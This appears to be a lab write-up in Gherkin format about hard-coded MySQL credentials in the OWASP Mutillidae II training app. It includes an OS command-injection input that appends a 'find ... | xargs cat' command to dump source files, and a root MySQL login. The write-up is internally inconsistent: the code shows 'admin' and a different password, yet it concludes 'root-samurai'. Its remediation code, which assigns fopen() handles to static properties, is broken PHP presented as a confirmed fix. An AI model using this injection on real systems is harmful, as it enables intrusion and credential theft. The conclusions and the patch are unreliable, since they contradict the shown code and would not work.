## Version 1.4.1
## language: en

Feature:
  TOE:
    Multillidae
  Location:
    http://192.168.0.68/index.php?page=dns-lookup.php
  CWE:
    CWE-798: Use of Hard-coded Credentials
  Rule:
    REQ.156 Source code without sensitive information.
  Goal:
    Get access to the mysql database.
  Recommendation:
    Clean the source code to delete sensitive information.

  Background:
  Hacker's software:
    | <Software name> | <Version>   |
    | ParrotSec       | 4.18.0      |
    | Google Chrome   | 71.0.3578   |
  TOE information:
    Given I am accessing the site http://localhost/index.php?page=dns-lookup.php
    And enter a php site that allows me to do a dnslookup under OS commands.
    And the server is running MySQL version 5.1.60
    And PHP version 5.5.9-1
    And is running on Ubuntu 4.25

  Scenario: Normal use case
  The system takes a URL as input and returns a DNS output.
    Given I access http://localhost
    And open http://localhost/index.php?page=dns-lookup.php
    Then I can see [evidence](evidence1.png)

  Scenario: Static detection

  The system does not sanitize the input  data
    When I look at the source code
    Then I can see that the vulnerability is being caused by MySQLHandler.
    """
    static public $mMySQLDatabaseHost = DB_HOST;

        /* ----------------------------------------------
         * DATABASE USER NAME
         * ----------------------------------------------
         * This is the user name of the account on the database
         * which OWASP Mutillidae II will use to connect. If this is set
         * incorrectly, OWASP Mutillidae II is not going to be able to connect
         * to the database.
         * */
        static public $mMySQLDatabaseUsername = "admin";

        /* ----------------------------------------------
         * DATABASE PASSWORD
         * ----------------------------------------------
         * This is the password of the account on the database
         * which OWASP Mutillidae II will use to connect. If this is set
         * incorrectly, OWASP Mutillidae II is not going to be able to connect
         * to the database. On XAMPP, the password for user
         * account root is typically blank.
         * On Samurai, the $dbpass password is "samurai" rather
         * than blank.
         * */
        static public $mMySQLDatabasePassword = "0JINyPwk3RS8";
    """
    Then I can conclude the user and pass for the database are root-samurai

  Scenario: Dynamic detection
  The page allows OS commands execution.
    When I access http://localhost/index.php?page=dns-lookup.php
    Then I can input the following line:
    """
    www.example.com; find /app -name "MySQLHandler.php"
    | xargs cat | sed 's/</\&#60;/g' | sed 's/>/\&#62;/g'
    """
    Then I get the output:
    """
    static public $mMySQLDatabaseHost = DB_HOST;

        /* ----------------------------------------------
         * DATABASE USER NAME
         * ----------------------------------------------
         * This is the user name of the account on the database
         * which OWASP Mutillidae II will use to connect. If this is set
         * incorrectly, OWASP Mutillidae II is not going to be able to connect
         * to the database.
         * */
        static public $mMySQLDatabaseUsername = "admin";

        /* ----------------------------------------------
         * DATABASE PASSWORD
         * ----------------------------------------------
         * This is the password of the account on the database
         * which OWASP Mutillidae II will use to connect. If this is set
         * incorrectly, OWASP Mutillidae II is not going to be able to connect
         * to the database. On XAMPP, the password for user
         * account root is typically blank.
         * On Samurai, the $dbpass password is "samurai" rather
         * than blank.
         * */
        static public $mMySQLDatabasePassword = "0JINyPwk3RS8";
    """
    Then I can conclude that user-pass are hard coded in source code.

  Scenario: Exploitation
  Reading the config file display the hard coded user and pass.
    Given the hard coded user pass variables are visible
    Then I can execute the following command:
    """
    mysql -h localhost -uroot -psamurai
    """
    Then I get the output:
    """
    Welcome to the MySQL monitor. Commands end with ; or /g.
    Your MySQL connection id is 102
    Server version: 5.1.60 Source distribution
    """
    Then I can conclude that I have root access to the database.

  Scenario: Remediation
  The source code should read the credentials from a separate file with
  read only root access and comments with sentive information should be
  deleted.
    Given I have patched the code by deleting hard coded user-pass
    """
    static public $mMySQLDatabaseHost = DB_HOST;
    static public $mMySQLDatabaseUsername = fopen("user-pass.txt", "r");
    static public $mMySQLDatabasePassword = fopen("user-pass.txt", "r");
    """
    Then If I re-run my exploit:
    """
    www.cnn.com; find /app -name "MySQLHandler.php"
    | xargs cat | sed 's/</\&#60;/g' | sed 's/>/\&#62;/g'
    """
    Then I get:
    """
    static public $mMySQLDatabaseHost = DB_HOST;
    static public $mMySQLDatabaseUsername = fopen("user-pass.txt", "r");
    static public $mMySQLDatabasePassword = fopen("user-pass.txt", "r");
    """
    Then I can confirm that the vulnerability was successfully patched

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    9.6/10 (high) - AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
  Temporal: Attributes that measure the exploit's popularity and fixability
    9.4/10 (high) - E:H/RL:W/RC:C
  Environmental: Unique and relevant attributes to a specific user environment
    9.4/10 (high) - CR:H/IR:H/AR:H/MAV:A/MAC:L/MPR:N/MUI:N/MS:C/MC:H/MI:H/MA:H
  Scenario: Correlations
    No correlations have been found to this date 2019-02-05